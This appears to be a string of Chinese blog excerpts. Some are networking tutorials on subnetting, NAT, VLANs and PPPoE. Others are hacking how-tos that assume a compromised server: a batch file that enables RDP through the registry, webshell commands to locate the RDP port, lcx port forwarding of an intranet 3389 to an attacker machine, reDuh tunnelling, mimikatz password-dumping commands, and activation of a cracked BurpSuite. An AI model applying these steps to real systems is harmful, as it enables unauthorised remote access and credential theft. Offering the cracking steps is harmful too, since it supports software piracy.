现在来讨论这个小问题，202.117.240.0这个是一个地址段，不是一个IP地址。 202.117.240.0网络的掩码是多少？ 网络掩码能是255.255.255.255？如果是一个IP地址，那么应该写成 202.117.240.0/32，表示IP= 202.117.240.0属于网段202.117.240.0，这个网段只有一个IP地址，即202.117.240.0。 很显然，一个IP地址，无法平均分成16个子网。一个网段地址至少要包含16个地址，才有可能被16除，那么满足这个条件的网段要至少包含16个IP地址。 通过这篇文章的介绍知道以下信息： 202.117.240.0/32  这个网段有1个IP地址；202.117.240.0/31  这个网段有2个IP地址；202.117.240.0/30  这个网段有4个IP地址；202.117.240.0/29  这个网段有8个IP地址；202.117.240.0/28  这个网段有16个IP地址； 202.117.240.0/28黄色加亮的满足划分子网的能力，因为它包含16个IP地址，平均分成16个子网，每个子网包含一个IP地址，这16个IP地址的样子应该是这样的： 202.117.240.0/32202.117.240.1/32202.117.240.2/32202.117.240.3/32202.117.240.4/32。。。 202.117.240.13/32202.117.240.14/32202.117.240.15/32 一共16个IP地址。 继续玩上面的游戏，将网络掩码从28减小为27。202.117.240.0/27  这个网段有32个IP地址。32也可以被16整除，没有余数。 202.117.240.0/27一共32个地址，平均分成16份，每份的个数=2，用网络掩码来表示：202.117.240.0/31202.117.240.2/31202.117.240.4/31。。。202.117.240.28/31202.117.240.30/31 继续上面的游戏，将网络掩码从27减小为26。 202.117.240.0/26  这个网段有64个IP地址。64也可以被16整除，商=4，余数=0。 202.117.240.0/30202.117.240.4/30。。。202.117.240.56/30202.117.240.60/30 继续上面的游戏，将网络掩码从26减小为25。 202.117.240.0/25  这个网段有128个IP地址。128也可以被16整除，商=8，余数=0。 202.117.240.0/25被切割成16个子网，分别如下： 202.117.240.0/29202.117.240.8/29 。。。202.117.240.112/29202.117.240.120/29  继续上面的游戏，将网络掩码从25减小为24。 202.117.240.0/24  这个网段有256个IP地址。256也可以被16整除，商=16，余数=0。 202.117.240.0/24被切割成16个子网，分别如下： 202.117.240.0/28202.117.240.16/28202.117.240.32/28202.117.240.48/28202.117.240.64/28202.117.240.80/28202.117.240.96/28。。。202.117.240.208/28202.117.240.224/28202.117.240.240/28 还能继续玩吗？不能再玩了，因为再玩就把别人家的IP地址，分给了自己的孩子。让咱们试一试。 网络掩码从24减小为23。 202.117.240.0/23  这个网段有512个IP地址。512也可以被16整除，商=32，余数=0。 202.117.240.0/23被切割成16个子网，分别如下： 202.117.240.0/27 （自家的IP地址）202.117.240.32/27 （自家的IP地址）202.117.240.64/27 （自家的IP地址）202.117.240.96/27 （自家的IP地址）202.117.240.128/27 （自家的IP地址）。。。202.117.240.224/27 （自家的IP地址）202.117.241.0/27 （灰色部分，从这里开始都是别人家的IP地址）202.117.241.32/27。。。202.117.241.192/27202.117.241.224/27 所以，将202.117.240.0平均分成16个子网，202.117.240.0默认使用/24掩码，每个子网的掩码= “/28”。在没有约束网络掩码= /24的前提下，使用/28、/27、/26、/25也是可以的。使用/28表示该公司只拥有16个IP地址，使用/24表示该公司拥有256个IP地址。...

一、查询远程连接的端口 1、命令查询，win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启，将下面代码复制到bat文件，双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后，如何查找 1、通过大马的读注册表、找到3389端口，然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、环境： 1、内网主机IP：192.168.1.106  win2003 2、假设外网主机ip：192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口，转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中，根据不同环境，选择不同脚本 2、打开reDuh，将脚本文件上传的路径填写到URL，点击start，再点击create 3、打开远程连接，这个有点缓慢，但是可以连接成功的，详细见交流群视频教程 工具下载方式：加入交流群 ...

一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12，打开谷歌自带的开发人员工具，点击network 三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码 四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改 注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送 ...

声明：该软件来源网络，仅供学习交流 一、下载地址：加入交流群 二、解压后，双击打开BurpSuite点击 三、打开BurpSuiteLoader，将license信息复制到过去，点击next 四、选择manual activation 五、copy request到activation request，再将activation response复制过去，点击next 六、点击完成，一路下一步 ...

为什么我知道了自己pc的公网ip，还是ping不通呢？通过这个网站获得的ip www.ip138.com，并不能ping通。然后我在pc开了一个udp客户端进程，远程服务器也开了一个udp服务端进程，客户端发包给远程，可以收到回应，远程显示请求的ip也是对的。然后我在远程服务器开了一个客户端进程发包给我pc的ip，依旧没有反应。这是为什么呢。我电脑能看百度的网页说明我电脑的ip是有效的，百度也是可以响应。为什么反过来就请求它就卡住了？ 为何Ping不通自己的公网IP？默认读者有NAT的基础知识。如果没有，可以在博客里找NAT章节阅读。 ISP对于出网（outbound）流量，需要在ISP网关上用自己的外网接口（Internet facing interface）的IP地址来替换IP报文的源IP地址，并将创建的替换关系以NAT表的方式下压到硬件FIB表里。当Ping报文的回复报文返回时，在硬件芯片匹配到刚刚生成的FIB表，所以返程流量可以进来，并最终到达你的电脑，那么你就可以Ping通。 为何Ping不通呢？网关禁止Ping，其实就是一个Inbound方向的ACL Deny过滤列表，这个ACL列表比FIB表更先看到Ping的回复报文。由于拒绝操作，报文被丢弃，所以无法Ping通。 为何可以访问远程UDP服务器，而远程服务器作为客户端却无法访问我电脑上的服务器？ NAT网关，默认允许由内网（inside）主动发起的流量，而拒绝由外网（outside）主动发起的流量。 什么是内网（inside）主动发起的流量？你用电脑（inside）访问远程（outside）服务器，流量是内网的电脑触发的。 什么是外网（outside）主动发起的流量？远程服务器作为客户端（outside）访问你的电脑（inside）服务器，流量是外网的电脑触发的。 其实已经回答了你的第二个问题。当允许内网（inside）主动发起的流量，潜台词是，同时还允许返程流量。 远程服务器如何才能访问你的电脑呢？需要你的电脑在NAT网关上主动创建一个FIB表，一个FIB表条目其实就是一个小门，这个小门只允许曾经从这个小门出去的人，才能进来。如果不是从这个小门出去的人，对不起，无法进入。 这个小门其实就是一张转换表，假设你的电脑IP =192.168.1.2 , 使用2222端口访问服务器IP= 3.3.3.3 ，端口3333。  NAT网关生成的NAT表（192.168.1.2/2222， 3.3.3.3/3333）---（1.1.1.1/56789，3.3.3.3/3333）。 服务器看到的IP报文来自于1.1.1.1/56789。 NAT网关上小门的口令就是（1.1.1.1/56789，3.3.3.3/3333）。 服务器只要使用（3.3.3.3/3333）做为源IP/端口号，使用（1.1.1.1/56789）做为目的IP/端口号的IP报文，就可以从小门进入。 为了让小门永远敞开，需要双方用keep alive周期性刷新，否则小门会在没有流量刷新的情况下而超时删除，那么远程服务器的流量再也无法进入。只有让客户端主动发起流量，再创建一个小门才可以。...

在上文用VLAN这把砍刀将一个超级大广播域，切割成N个小广播域，每一个小广播域用一个VLAN代表。每一个交换机的端口分配一个VLAN，拥有相同的VLAN的端口属于同一个VLAN，同一个广播域。   一个交换机有48端口，被平均分成3个VLAN，分别为VLAN 10、20、30，每个VLAN 有16个端口。当一个广播报文从任意一个端口接收到，只扩散到其中的15个端口。   问题来了，交换机与交换机之间的互联端口如果只有一个，分配什么VLAN比较合适呢？ 10、20还是30？ 都不合适。如果分配10，那么VLAN 20、30的广播报文就无法从互联端口流走。   有同学可能会说，交换机之间使用3个互联端口，分别分配10、20、30，可以完美解决问题。   但是这样会浪费端口资源。如果有100个VLAN的流量需要从交换机之间互联端口穿梭，则需要100个端口，每一个端口属于一个VLAN。而交换机只有48个端口啊，剩下的52个端口从哪里来？   以上的做法很不现实。解决这个问题很简单，只要让交换机之间的互联端口属于每一个VLAN，属于每一个广播域。交换机之间这种互联端口类型叫Trunk，属于任何广播域。   当广播报文需要进入交换机之间的互联端口，必须明确告知接收方交换机，该广播报文属于哪个广播域，哪个VLAN，那发送交换机是怎么做的呢？   很简单。只要在广播报文里嵌入一个VLAN标签，规范这项技术的标准是IEEE 802.1Q。 接收交换机只要从广播报文里将VLAN标签提取出来，然后将广播报文扩散到属于该VLAN的所有端口，包括Trunk口。上文说了，Trunk口默认属于所有广播域。   通过以上方式，一个广播报文唰地一下就扩散到所有属于该广播域（VLAN）的所有端口。而不属于该广播域（VLAN）的端口不会受到该条广播报文的骚扰，因为它们永远听不到这条广播。广播报文的隔离就是这样来实现的。   当然，任何时候都有特殊情况的发生。有些广播报文是交换机自身产生的，那么这个广播报文属于哪个广播域（VLAN）呢？   如果是ARP广播报文，通常是交换机的三层接口触发的，而三层接口会绑定二层接口。交换机根据二层接口属于哪个VLAN，以此来推断ARP广播报文属于哪个VLAN。然后打上VLAN标签，在该VLAN广播域里进行扩散。 如果是Cisco PVST+消息，每一个消息自己会携带自己的VLAN ID。 如果是RSTP消息呢，消息没有明确告知交换机VLAN值。交换机呢，也不着急，什么VLAN标签也不打，让消息在trunk里自由扩散。接收交换机收到之后也不着急，而是将任何没有携带VLAN标签的报文，默认认为是Native VLAN广播域的报文，并在Native VLAN广播域进行扩散。由于Native VLAN默认值 =1，而VLAN1一般不会分配给终端用户。所有终端用户永远也收不到类似的广播报文。 VLAN隔离广播报文讲的差不多了，继续讲报文开头的故事。 一台开机的电脑，发出DHCP广播报文，被交换机扩散到属于该VLAN（10）的广播域。DHCP大神也在VLAN10里，自然听到了。大神给电脑分配了一个IP地址、网络掩码、网关、DNS服务器，分别如下：   IP = 10.1.1.2 Mask = 255.255.255.0 Gateway = 10.1.1.1 DNS = 10.1.1.1   并将消息以单播的方式发给这台电脑。同学们这里会有点疑惑，电脑在获得IP地址之前，还没有IP地址，大神怎么将消息单播给这台电脑呢？   此时电脑虽然没有IP地址，默认使用0.0.0.0这个地址，这个地址是无意义的，大神也知道是无意义的，大神并不care。但是电脑有自己的MAC地址啊，大神发出的单播报文只要填写目的MAC = 这台电脑的MAC，是不是就可以将消息单播给这台电脑了？   是的。   坐在电脑后的老王登场了，想Ping 10.1.2.2这台电脑玩玩，敲完命令回车，老王盯着屏幕看，以下是屏幕背后发生的故事。   电脑发现10.1.2.2和自己10.1.1.2并不在一个广播域。有同学可能会问，电脑知道怎么这两个IP地址不在一个广播域的？   电脑想笑但是忍住了，一个广播域内每台电脑的网段必须相同，否则就不是一个广播域。显然 10.1.2.2的网段 = 10.1.2，10.1.1.2的网段= 10.1.1，两个网段号明显不相同。   既然不在一个广播域，老王的电脑10.1.1.2能ARP广播发现10.1.2.2的MAC地址吗？ 不能啊，不同的广播域有VLAN隔离着呢！   不在一个广播域，ARP广播也会被VLAN隔离，不会到达对方（10.1.2.2）的广播域，你觉得老王的电脑会发ARP广播请求对方的MAC地址吗？   不会的，电脑没那么傻！   无法发现对方的MAC地址，就无法完成二层以太协议头的封装，那么不同广播域的电脑就无法通信，囚徒困境？   并不是。   每个广播域都有一个特殊的角色，它的名字叫网关。网关可以代理转发不同广播域电脑之间的通信。比如上文中的网关=10.1.1.1就是这个特殊的角色。   老王电脑一旦发现对方和自己不在一个广播域，就会知道需要将Ping报文发给网关。 虽然知道网关的IP = 10.1.1.1，但光知道这个还不行，还需要ARP广播获得网关的MAC地址才能把Ping报文扔给网关。   由于网关IP = 10.1.1.1 和老王的电脑IP = 10.1.1.2，属于同一个网段，同一个广播域，那么ARP广播自然可以到达网关，那么就可以获得网关的MAC地址。   老王电脑将Ping报文扔给网关，网关收到这个目的IP = 10.1.2.2 的Ping报文怎么处理呢？   电脑 收到目的IP = 自己的IP，会将报文扔给CPU处理。 收到目的IP≠自己IP的报文会直接扔掉，气量太小，所以做不了网关。   网关 收到目的IP = 自己的IP，也会将报文扔给CPU处理。这是网关的主机（End System）一面，和普通电脑没有任何区别。 网关如果收到目的IP≠自己IP，会查询路由表做流量转发，这是网关的路由器（Intermediate System ）的另一面，这就是路由器区别于普通电脑的一面。   网关发现自己另外一个接口IP = 10.1.2.1/24 与Ping报文的目的IP =10.1.2.2在一个相同的广播域，于是认为目标主机应该就在这个广播域。于是发出ARP广播请求对方的MAC地址。一旦获得MAC地址，就可以将Ping报文扔给这台10.1.2.2电脑。   总结一下   路由器 作为每一个广播域的优秀代表，不光可以为自己服务，而且可以为广播域其它电脑服务。 路由器尽管气量很大，但是只服务单播报文。遇到广播报文只会扔给CPU，不会转发。 一个广播域的接口，使用不同的网段。如果试图使用相同的网段、或者部分重叠的网段，路由器会拒绝使用。   交换机 使用VLAN来隔离广播域，一个VLAN一个广播域。 ...

路由器能隔绝广播，那要VLAN有什么用？既配置了VLAN又划分在不同的网段是不是有些多余了？ 透彻理解每一个字的真正涵义，有时并不那么容易。以下文字为了尝试让同学们透彻理解这些字的真正涵义。 什么是广播（Broadcast）？ 广播报文，就是任何主机无条件接收的报文。无条件这三个字就不多解释了，可以理解为必须、强制的。 广播报文，如果没有IP协议头，只有Ethernet协议头，那么就是二层广播，二层广播地址 = FF:FF: FF:FF: FF:FF。 如果有IP协议头，那么就是三层广播，三层广播地址 = 255.255.255.255。 既然有广播，就会有单播（Unicast）。  什么是单播（Unicast）？如果高音喇叭是广播，管你愿不愿意听，你一定能听到。单播就是你和朋友在打电话，两者参与的点对点通信。  为何要有广播？广播报文都用在什么地方？ 电脑开机的时候，需要一个IP地址与外部的世界通信。哪位大神能做点慈善事业，给这台电脑分配一个IP地址啊？这位做慈善事业的大神名字叫：DHCP服务器。 电脑并不知道有没有大神，也不知道大神的IP地址。如果知道大神的IP地址，就可以与大神单播通信了，对吗？ 电脑并不care这些。每台电脑开机的时候都会使用广播来碰碰运气，于是发出了一个DHCP广播报文。 DHCP广播报文从网口流出去了，流到哪里去了？ 交换机。 交换机怎么来处理这个广播报文？ 交换机检查DHCP广播报文的目的MAC= FF:FF: FF:FF: FF:FF，知道这是一个广播报文。然后怎么处理？ 需要将这个DHCP广播报文，发给这个广播域中的每一个端口。因为广播的涵义是每一个端口连接的电脑都需要接收，交换机这么做很好理解吧？ 什么又是广播域呢？广播域，就是一个广播报文可以扩散的势力范围。比如，高音喇叭（广播），它的扩散范围就是一个广播域。默认情况下，交换机所有端口处于一个广播域。假设交换机有48个端口，那么这48个端口都处于同一个广播域。 交换机会将DHCP广播报文复制（copy）47次，将报文依次从47个端口流出（outgoing）。不是48个端口吗？怎么只从47个端口流出？其中有一个进口（incoming），即交换机接收到DHCP广播报文那个端口，需要剔除出去。 不要忘记，一个大型的网络可能有成百上千台交换机，上文中的47个端口通常会有1-2个端口连接其它交换机。那么DHCP广播报文就顺利地流到了其它交换机，然后继续扩散到所有端口。而其它的交换机还会连接着另外的交换机，就这么循环下去。假设网络里有100台交换机，一共48 * 100 = 4800个端口，那么4799个端口都会收到DHCP广播报文。 如果每个端口都连着电脑，那么4799个DHCP广播报文，就会产生4799次网卡的硬件中断，中断CPU的正在处理的工作，来处理这个DHCP广播报文。对于99.9%的电脑来说，完全是一种地地道道的骚扰，因为它们压根不是DHCP服务器大神，中断CPU难道很好玩吗？ 不就是4799次广播报文吗？计算机CPU高速计算能力处理起来还不是小菜一碟？ 如果4800台电脑都发一次DHCP广播报文呢？那么就是4800 *4800 = 23,035,200 。 如果是48000台电脑，每台主机一天发100个报文呢？ 48000 * 48000 * 100 = 230400000000 次报文复制/天。 广播报文不光骚扰电脑的CPU，还消耗交换机硬件吞吐能力。你以为交换机的复制报文行为是很轻松的事吗？ 其实并不是，复制报文的操作一样会消耗硬件资源，一样会消耗内部数据总线资源。 站着说话轻松，是因为我们并不知道交换机背后所付出的努力。而为了保护交换机被广播报文的骚扰，以及保护那些电脑的CPU的免受广播的骚扰，必须将广播域的势力范围大大缩小。用哪把砍刀将广播域的势力范围砍小呢？ 砍刀的名字叫VLAN！ VLAN 不同的电脑属于不同的业务部门，相同的业务部门使用同一个VLAN，一个VLAN就是上文的一个广播域。 只要将交换机端口分配到不同的VLAN里，就可以实现将交换机端口划分到不同的广播域。这句话如果看不懂，实在抱歉，真的帮不上你了。 接下来就简单了，对于入口（incoming）的广播报文，需要转发到哪些出口（outgoing）呢？ 那么就根据入口（incoming port）属于哪个VLAN，然后把属于该VLAN的所有端口过滤出来，广播报文只转发到这些过滤出来的端口（入接口除外），因为它们属于一个广播域。而不要将广播报文发到所有的端口。...

为什么IP地址和网关一样还能上网，这样默认路由不就是自己了吗？ 电信的网，固定IP，给了一个公网地址，IP地址(中间隐藏了)：60.*.*.239，掩码：255.255.255.0，网关:60.*.*.239，网关的地址和IP是一样的，这样的话默认路由的下一跳不就是自己了吗，但是可以上网，百度搜索IP显示的地址也和电信给的一样60.*.*.239。 这里的网关，可以是任何IP地址，如果你喜欢，可以换成6.6.6.6或8.8.8.8等幸运数字也是可以上网的。 为什么呢？这里使用了PPPoE拨号技术，在这台网络设备与电信NAS网关之间动态创建了一条P2P（Point to Point）的隧道。隧道的本地虚拟接口假设为VA1，所有非60.x.x.0/24网段的流量都会通过VA1接口流出本地。 为何要从VA1流出本地？因为系统创建一条默认路由，类似于： 0.0.0.0/0  ------------ >   VA1 VA1其实类似与ethernet接口。当我们使用ethernet接口来上网时，IP报文需要通过ethernet接口流出时，ethernet接口必须做的一件事是封装（Encapsulation）： Ethernet+ IP报文 有读者说，封装之前，至少还需要目的MAC地址，不是吗？是的，需要ARP广播来发现网关的MAC地址，然后“Ethernet + IP报文“就可以流出网口了，对吗？ Okay，当用户的IP报文需要从VA1接口流出时，VA1接口必须做的一件事也是封装： PPPoE + IP报文 然后呢，这个“PPPoE + IP报文“能长出翅膀飞走？ 不能。 既然不能，那么这个报文最终还是要乖乖地从ethernet接口（网口）这个物理接口流出。既然要从ethernet接口流出，一定要遵守ethernet接口的潜规则，必须完成封装： Ethernet + PPPoE + IP报文 这里ethernet封装也需要目的MAC地址，对吗？ 是的。 是否也需要使用ARP广播来发现NAS网关的MAC地址？ 不需要。 为什么？ 因为PPPoE握手协商阶段，已经通过Discovery、Offer等报文提前获得了PPPoE服务器（NAS网关）的MAC地址。既然知道了，就没有必要ARP广播了。 于是就发生了神奇的一幕，报文最终通过ethernet接口流出，但是竟然没有使用ARP广播。 当报文顺着ISP的接入网络一路流到NAS网关时，NAS网关干两件事：  剥离Ethernet封装，因为目的MAC地址是自己的，否则直接丢弃 剥离PPPoE封装，根据剩下的IP裸报文继续路由转发 网关的地方既然任何IP地址都可以，那能否是空白的？ 应该不可以，如果空白，将不会有上文那条默认路由。 最后一点，NAS网关的下行方向的路由是什么样子的？ 60.x.x.239/32  ------------ >   VAn 这里的网络掩码为何是32，而不是24? 欢迎加入交流群一起讨论！...

一、软件介绍 一款获取windows账号密码的软件 二、下载地址（软件作者） https://github.com/gentilkiwi/mimikatz 或加入Kirin博客交流群下载 三、使用方法 1、解压后双击打开，分32位和64位 2、输入下面两行命令，直接获取密码 privilege::debug sekurlsa::logonpasswords ...